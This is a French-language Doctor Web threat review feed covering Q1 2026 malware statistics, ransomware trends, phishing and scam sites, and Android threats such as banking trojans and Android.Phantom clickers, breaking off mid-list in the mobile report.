&lt;p&gt;En janvier, les experts de Doctor Web ont signalé l'existence de Trojans de type clicker &lt;b&gt;Android.Phantom&lt;/b&gt;, qui utilisent l'apprentissage automatique et les flux vidéo pour augmenter le nombre de clics sur les sites web. De plus, au cours des trois derniers mois, nous avons constaté l'apparition de nouveaux logiciels malveillants dans le catalogue Google Play, notamment des chevaux de Troie qui abonnent les utilisateurs à des services payants.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendances principales du 1er trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Diminution du nombre de menaces détectées sur les appareils protégés. &lt;/li&gt;
        &lt;li&gt;Le nombre de fichiers uniques parmi les menaces détectées a diminué.&lt;/li&gt;
        &lt;li&gt;Par rapport à la période de surveillance précédente, moins de demandes de déchiffrement de fichiers affectés par des chevaux de Troie de type ransomware ont été enregistrées.&lt;/li&gt;
        &lt;li&gt;L'activité des chevaux de Troie bancaires pour appareils Android a continué de croître.&lt;/li&gt;
        &lt;li&gt;Des utilisateurs ont été menacés par des programmes malveillants &lt;b&gt;Android.Phantom&lt;/b&gt;, qui utilisent notamment des technologies d'apprentissage automatique pour manipuler les clics sur les sites web.&lt;/li&gt;
        &lt;li&gt;De nouvelles applications malveillantes ont été détectées sur Google Play.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Données du service de statistiques de Doctor Web&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les menaces les plus répandues au cours du 1er trimestre 2026 :&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie écrit dans le langage de programmation Go et conçu pour charger divers miners et logiciels publicitaires dans le système cible. Le malware est un fichier DLL situé dans &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Pour son lancement, il exploite une vulnérabilité de la classe DLL Search Order Hijacking dans le client torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Adware.Downware.20655&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Adware souvent utilisé comme outil intermédiaire de téléchargement de programmes pirates.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Composant malveillant de l'extension de navigateur WinSafe. Ce composant est un script JavaScript qui affiche des publicités intrusives dans les navigateurs.&lt;/dd&gt;
    &lt;dt&gt;Adware.Siggen.33379&lt;/dt&gt;
    &lt;dd&gt;Faux bloqueur de publicités pour les navigateurs web Adblock Plus, qui est installé sur le système par d'autres applications malveillantes dans le but d'afficher des publicités.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistiques relatives aux programmes malveillants détectés dans le trafic e-mail&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les menaces les plus courantes dans le trafic de messagerie au premier trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;JS.DownLoader.1225&lt;/dt&gt;
    &lt;dd&gt;Détection heuristique des archives ZIP contenant des scripts JavaScript aux noms suspects.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Famille de Trojans Downloaders qui exploitent les vulnérabilités des documents créés dans MS Office. Ils sont conçus pour télécharger d'autres logiciels malveillants sur l'ordinateur attaqué.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Exploits conçus pour exploiter des vulnérabilités dans le logiciel Microsoft Office et qui permettent l'exécution du code arbitraire.&lt;/dd&gt;
    &lt;dt&gt;JS.Redirector.514&lt;/dt&gt;
    &lt;dd&gt;Script malveillant qui redirige l'utilisateur vers une page Web contrôlée par les pirates.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Rançongiciels&lt;/h3&gt;

&lt;p&gt;Par rapport au quatrième trimestre 2025, le nombre de demandes pour le déchiffrement de fichiers touchés par des rançongiciels a diminué de 31,51% au 1er trimestre. Cette diminution s'est produite durant les fêtes du Nouvel An et du long week-end qui a suivi, période durant laquelle un certain nombre de cybercriminels ont pu suspendre leurs activités et partir en vacances. Cependant, les utilisateurs qui ont subi des attaques de ransomware durant cette période n'ont peut-être pas réagi immédiatement aux incidents.&lt;/p&gt;

&lt;p&gt;Dynamique des demandes de décryptage reçues par le support technique de Doctor Web :&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les encodeurs les plus répandues au cours du 1er trimestre 2026 :&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 15,59% des demandes&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.fr/search/?q=Trojan.Encoder.29750&amp;lng=fr"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3,23% des demandes&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868 &lt;/b&gt; — 3,23% des demandes&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.fr/search/?q=Trojan.Encoder.26996&amp;lng=fr"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 1,62% des demandes&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383 &lt;/b&gt; — 1,61% des demandes&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Fraude sur le Web&lt;/h3&gt;

&lt;p&gt;Au cours des trois derniers mois, les analystes Internet de Doctor Web ont identifié plusieurs nouveaux sites Web de marketplace contrefaits. Sur de tels sites, les escrocs proposent de participer à une prétendue « vente » de commandes non recupérées. L'arnaque fonctionne de la manière suivante : Les articles issus de commandes « non réclamés » sont triés en différentes catégories (électronique, vêtements, chaussures, cosmétiques, etc.) puis soi-disant regroupés dans des boîtes surprises correspondantes. &lt;br /&gt;Leur contenu est inconnu et peut inclure, entre autres, des objets de valeur. Ces boîtes sont proposées à la vente à un prix relativement bas, ce qui constitue leur principal attrait.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/04_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/04_market.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un faux site de vente en ligne promet une « vente » de commandes non réclamées qui proviendraient soi-disant d'entrepôts débordées.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Lorsqu'un utilisateur sélectionne l'une des boîtes, il lui est demandé de passer une commande et de fournir des informations personnelles, qui peuvent inclure ses nom et prénom, son numéro de téléphone portable et son adresse électronique. Il est ensuite redirigé vers la page de paiement via le service de paiement rapide. Par conséquent, la victime perd son argent et divulgue des informations confidentielles aux escrocs.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/05_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/05_market.2.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/06_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/06_market.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Après avoir passé la « commande », la victime est invitée à la régler via le système de paiement rapide.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nos experts ont également identifié de nombreux sites web proposant divers services financiers, tels que la possibilité d'obtenir rapidement un microcrédit, un prêt ou une déclaration de faillite. Ces services ne fournissent pas eux-mêmes les prestations attendues par les utilisateurs et agissent uniquement en tant qu'intermédiaires entre les clients et les institutions financières. Ils offrent un accès payant à une sélection d'options potentiellement adaptées, tandis que le regroupement d'offres financières similaires est disponible gratuitement. De plus, ces services ne garantissent pas le résultat favorable de la demande. Par ailleurs, le paiement de l'accès n'est pas un paiement unique, mais un abonnement payant avec des prélèvements périodiques.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/07_finance.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/07_finance.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;L'un des sites web où l'accès au service de sélection d'offres financières est payant et se fait sous forme d'abonnement.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dans certains cas, ces ressources peuvent induire les utilisateurs en erreur en proposant un service, comme l'emploi, mais en offrant en réalité un accès par abonnement aux offres financières pour des prêts, des microcrédits, etc.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/08_job.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/08_job.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le site web promet une aide à la recherche d'emploi, mais après avoir payé pour accéder au service, au lieu d'une offre d'emploi, il peut proposer des offres financières de partenaires sous forme de prêts, de microcrédits, etc.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Parmi les sites d'hameçonnage identifiés au premier trimestre figuraient de fausses ressources internet concernant la course sportive Marathon Vert. Ces sites proposent aux visiteurs de s'inscrire au marathon, mais ils ne sont pas affiliés à l'événement et sont conçus pour collecter les données confidentielles des utilisateurs.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/09_maraphon.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/09_maraphon.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un des faux sites web pour la course du Marathon Vert&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Les analystes internet de Doctor Web ont également identifié d'autres sites web de services d'investissement frauduleux, prétendument liés à divers établissements de crédit. Parmi eux figuraient des sites web ciblant des utilisateurs de Russie, du Kazakhstan et d'autres pays. Les escrocs promettent à leurs victimes potentielles des profits élevés et, pour « accéder » à des plateformes de pseudo-investissement, leur demandent de remplir un court questionnaire et de créer un compte en fournissant des informations personnelles.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Exemple de site d'hameçonnage que les pirates informatiques font passer pour la ressource officielle du service d'investissement d'une banque russe.&lt;/em&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Exemple de site d'hameçonnage que les pirates informatiques font passer pour la ressource officielle d'un service d'investissement d'un établissement de crédit kazakh.&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb.fr/dangerous_urls/"&gt;En savoir plus sur les sites non recommandés par Dr.Web&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Logiciels malveillants et indésirables ciblant les appareils mobiles&lt;/h3&gt;

&lt;p&gt;Selon les statistiques de détection de Dr.Web Security Space pour les appareils mobiles, le premier trimestre 2026 a connu une augmentation continue de l'activité du cheval de Troie bancaire &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, qui avait été observée au quatrième trimestre de l'année précédente. Les plus répandus étaient des représentants de la sous-famille &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;. Parallèlement le nombre de détections des chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; a de nouveau diminué.&lt;/p&gt;

&lt;p&gt;Parmi les logiciels potentiellement dangereux détectés, les plus courants étaient des programmes dans lesquels du code erroné était introduit à l'aide d'outils de modification (détectés comme &lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Cette technique est actuellement utilisée activement pour protéger les chevaux de Troie bancaires contre la détection par les logiciels antivirus. De plus, les applications modifiées à l'aide de l'utilitaire NP Manager (détectées sous le nom de &lt;a href="https://vms.drweb.fr/search/?q=Tool.NPMod&amp;lng=fr"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;) sont restées largement répandues.&lt;/p&gt;

&lt;p&gt;Les logiciels indésirables le plus fréquemment détectés ont été les faux antivirus &lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, qui exigeaient l'achat de la version complète pour « éliminer » les menaces supposément détectées. Les programmes publicitaires les plus actifs au cours du premier trimestre étaient &lt;a href="https://vms.drweb.fr/search/?q=Adware.Bastion&amp;lng=fr"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; et &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Les premières sont des applications d'optimisation qui créent des notifications contenant des messages concernant une mémoire insuffisante et des erreurs système supposées, afin d'afficher des publicités pendant l'« optimisation ». Les derniers sont de faux programmes de triche censés permettre d'obtenir diverses ressources dans les jeux, mais en réalité, ils ne font que télécharger des sites web publicitaires.&lt;/p&gt;

&lt;p&gt;En janvier 2026, notre laboratoire antivirus a mis en garde contre les &lt;a href="https://news.drweb.fr/show/?i=15110" target="_blank"&gt;Trojans Clickers&lt;/a&gt; &lt;b&gt;Android.Phantom&lt;/b&gt;. Ces applications malveillantes utilisent l'apprentissage automatique et les flux vidéo pour manipuler les clics sur les sites web.&lt;br /&gt;Les cybercriminels les ont distribués par plusieurs méthodes : via le catalogue GetApps pour les appareils Xiaomi, les chaînes Telegram, les serveurs Discord, les collections de logiciels tiers et les sites web malveillants.&lt;/p&gt;

&lt;p&gt;Au cours des trois derniers mois, les analystes antivirus de Doctor Web ont identifié de nouvelles menaces dans le catalogue Google Play, notamment les applications de type cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, conçues pour inciter les utilisateurs à s'abonner à des services payants.&lt;/p&gt;

&lt;p&gt;Les événements les plus importants du 1er trimestre liés à la sécurité des appareils mobiles :&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Les Trojans bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; sont devenus la menace la plus courante pour les appareils Android.&lt;/li&gt;
    &lt;li&gt;Les cybercriminels utilisent de plus en plus les outils de modification d'applications Android pour protéger les chevaux de Troie bancaires contre la détection par les antivirus.&lt;/li&gt;
    &lt;li&gt;La tendance à la baisse de l'activité des chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; s'est poursuivie.&lt;/li&gt;
    &lt;li&gt;Les utilisateurs ont été menacés par les chevaux de Troie &lt;b&gt;Android.Phantom&lt;/b&gt;, qui utilisent l'apprentissage automatique et les flux vidéo pour manipuler les clics sur les sites web.&lt;/li&gt;
    &lt;li&gt;De nouvelles applications malveillantes ont été détectées sur Google Play.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Pour en savoir plus sur la situation virale et les menaces ciblant les appareils mobiles au 1er trimestre 2026, consultez notre &lt;a href="https://news.drweb.fr/show/review/?i=15136" target="_blank"&gt;Rapport&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15136&amp;lng=fr</guid><title>Doctor Web : rapport viral sur les menaces pour appareils mobiles du 1er trimestre 2026</title><link>https://news.drweb.fr/show/?i=15136&amp;lng=fr&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;le 1 avril 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Selon les statistiques de détection de Dr.Web Security Space pour les appareils mobiles, l'activité des logiciels malveillants affichant des publicités intempestives, tels que &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, a continué de diminuer au premier trimestre 2026. Les premiers ont été détectés sur les appareils protégés 32,70 % moins souvent, tandis que les seconds ont été détectés 7,09 % moins souvent par rapport au quatrième trimestre de l'année dernière. Ils ont cédé leur place aux chevaux de Troie bancaires de la famille &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, dont l'activité a été multipliée par plus de 2,5 au cours des trois derniers mois. De ce fait, ces programmes sont devenus les menaces les plus répandues pour Android. Ces applications malveillantes interceptent les SMS contenant les codes de confirmation des transactions bancaires, affichent des fenêtres d'hameçonnage et peuvent également imiter l'apparence de logiciels bancaires légitimes pour voler des données confidentielles. Les utilisateurs rencontraient le plus souvent des chevaux de Troie de la sous-famille &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, qui comprend divers programmes malveillants.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Les applications dans lesquelles du code inutile a été ajouté pour obscurcir la logique à l'aide d'outils de piratage pour modding de NP Manager se sont largement répandues (15,35 % du nombre total de détections) au cours du premier trimestre.&lt;/p&gt;

&lt;p&gt;Depuis l'automne dernier, ces outils sont activement utilisés par la famille de chevaux de Troie &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; pour empêcher leur détection par des logiciels antivirus. C'est pourquoi nous vous avertissons si l'une de ces applications a été modifiée. Ce type de logiciel est détecté par les produits antivirus Dr.Web comme &lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Un autre logiciel potentiellement dangereux courant, malgré une diminution de &lt;span class="text-nowrap"&gt;31,65 %&lt;/span&gt; du nombre de détections, était à nouveau un programme modifié à l'aide de l'utilitaire NP Manager (détecté par Dr.Web sous le nom de &lt;a href="https://vms.drweb.fr/search/?q=Tool.NPMod&amp;lng=fr"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;). Cet utilitaire contient divers modules permettant d'obfusquer et de protéger le code du programme, ainsi que de contourner la vérification de leur signature numérique après modification. Les cybercriminels l'utilisent pour protéger des logiciels malveillants afin d'empêcher leur détection par les antivirus.&lt;/p&gt;

&lt;p&gt;Les applications indésirables les plus courantes sont de faux programmes antivirus &lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, qui prétendent détecter des menaces et exigent l'achat de la version complète pour les « éliminer ». De plus, les utilisateurs ont de nouveau rencontré des programmes des familles &lt;a href="https://vms.drweb.fr/search/?q=Program.FakeMoney&amp;lng=fr"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Program.CloudInject&amp;lng=fr"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;. Les premiers permettent soi-disant de gagner de l'argent en accomplissant diverses tâches. Les seconds sont des logiciels modifiés via le service cloud CloudInject. Il sert à ajouter des autorisations système dangereuses et du code obscurci aux applications, dont le fonctionnement ne peut être contrôlé.&lt;/p&gt;

&lt;p&gt;Parmi les logiciels publicitaires, les programmes d'optimisation les plus détectés étaient &lt;a href="https://vms.drweb.fr/search/?q=Adware.Bastion&amp;lng=fr"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Ils envoient régulièrement des notifications contenant des messages trompeurs concernant de prétendus problèmes de mémoire et des erreurs système. Leur but est d'afficher des publicités pendant les opérations d'« optimisation ». Un autre logiciel publicitaire populaire était l'application &lt;b&gt;Adware.Opensite.15&lt;/b&gt; que les attaquants déguisaient en outils de triche pour obtenir des ressources dans les jeux. En réalité, ces programmes téléchargent divers sites web de publicités. Les programmes dotés de modules publicitaires intégrés, tels que &lt;a href="https://vms.drweb.fr/search/?q=Adware.AdPush&amp;lng=fr"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, se sont également largement répandus à nouveau.&lt;/p&gt;

&lt;p&gt;En janvier, Doctor Web a informé les utilisateurs de l'existence d'&lt;b&gt;Android.Phantom&lt;/b&gt;, une &lt;a href="https://news.drweb.fr/show/?i=15110" target="_blank"&gt;nouvelle famille d'applications de type « clicker »&lt;/a&gt; basées sur un cheval de Troie. Nos analystes antivirus ont identifié plusieurs sources de diffusion de ce logiciel malveillant. L'une d'elles est GetApps, le catalogue d'applications officiel des appareils Xiaomi, où des chevaux de Troie ont été injectés dans plusieurs jeux. De plus, des cybercriminels ont distribué des programmes de "clicker" ainsi que des versions modifiées d'applications populaires via divers canaux Telegram, serveurs Discord, plateformes de téléchargement de logiciels en ligne et sites web malveillants.&lt;/p&gt;

&lt;p&gt;En utilisant &lt;b&gt;Android.Phantom&lt;/b&gt;, les attaquants manipulent des clics publicitaires sur les sites web grâce à l'apprentissage automatique et à WebRTC, une technologie permettant de transmettre des données en flux continu (y compris la vidéo) via un navigateur. Les chevaux de Troie chargent des ressources Internet cibles dans une WebView invisible, ainsi que du code JavaScript pour simuler les actions de l'utilisateur. L'interaction avec les publicités se fait selon deux modes. Si l'appareil prend en charge WebRTC, les clickers &lt;b&gt;Android.Phantom&lt;/b&gt; diffusent un écran virtuel sur lequel est chargé un site web contrôlé manuellement ou à l’aide d’un système automatisé par les attaquants.&lt;/p&gt;

&lt;p&gt;Si WebRTC n'est pas disponible, des scripts JavaScript automatisés utilisant le framework TensorFlowJS sont utilisés. Les programmes de "clicker" téléchargent un modèle comportemental requis depuis un serveur distant, ainsi que le code JavaScript contenant le framework lui-même et toutes les fonctions nécessaires au fonctionnement du modèle et à son interaction avec les sites cibles.&lt;/p&gt;

&lt;p&gt;Au cours du premier trimestre, le laboratoire antivirus de Doctor Web a enregistré l'apparition de nouvelles menaces dans le catalogue Google Play. Il s'agit notamment de nombreux chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, ainsi que des logiciels malveillants &lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;. Ils ont tous été créés pour inciter les utilisateurs à s'abonner à des services payants.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendances principales du 1er trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Les chevaux de Troie bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; sont devenus les menaces les plus répandues sur Android.&lt;/li&gt;
        &lt;li&gt;Les attaquants utilisent de plus en plus les outils de modding des programmes Android pour protéger les chevaux de Troie bancaires.&lt;/li&gt;
        &lt;li&gt;L'activité des chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; a continué de diminuer.&lt;/li&gt;
        &lt;li&gt;La propagation des chevaux de Troie &lt;b&gt;Android.Phantom&lt;/b&gt;, qui utilisent l'apprentissage automatique et le streaming vidéo pour manipuler les clics sur les sites web.&lt;/li&gt;
        &lt;li&gt;Détection de nouvelles applications malveillantes sur Google Play.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Selon les données obtenues par Dr.Web Security Space pour les appareils mobiles&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie bancaire qui intercepte les SMS contenant des codes à usage unique provenant d'établissements de crédit, le contenu des notifications et collecte d'autres informations confidentielles. Ces informations comprennent des données techniques sur l'appareil infecté, une liste des applications installées, des informations sur la carte SIM, les appels téléphoniques, les SMS reçus et envoyés.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.FakeApp&amp;lng=fr"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie qui télécharge un site Web indiqué dans ses paramètres. Les modifications connues de cette application malveillante téléchargent un site de casino en ligne.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan qui est conçu pour afficher des publicités. Les représentants de la famille &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; sont souvent diffusés sous couvert d'applications inoffensives et, dans certains cas, sont installés dans le répertoire système par d'autres malwares. Une fois sur les appareils Android, ces chevaux de Troie publicitaires masquent généralement leur présence dans le système. Ils « masquent » notamment l'icône de l'application dans le menu de l'écran d'accueil.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
